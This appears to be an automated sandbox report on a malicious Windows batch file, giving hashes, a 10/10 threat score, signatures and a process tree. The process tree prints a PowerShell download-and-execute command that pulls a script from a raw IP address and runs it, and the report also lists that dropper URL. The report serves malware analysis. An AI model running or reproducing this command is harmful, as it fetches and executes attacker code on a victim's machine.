Analysis
-
max time kernel
108s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
04-03-2020 16:10
General
-
Target
UJvbivju.bat
-
Size
189B
-
MD5
30e9f006bd27f61b87649fb861b70525
-
SHA1
602c170aa87ed68a7c5f68f15a162bdbd51dfc1f
-
SHA256
c27c8d9ea31e707420a5f77581ead62b943e9195989ff1d5df30d0ecafefe2e6
-
SHA512
f9c62d8bff196da519b3c336d079781f33cdd0123f910448d9b8be41b732b149dbbed44e1bdb58ebf67d914ae4ec0d376ac16688851ea6714a21cf638a6cd7ae
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/UJvbivju
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UJvbivju.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/UJvbivju');Invoke-QGTRJX;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB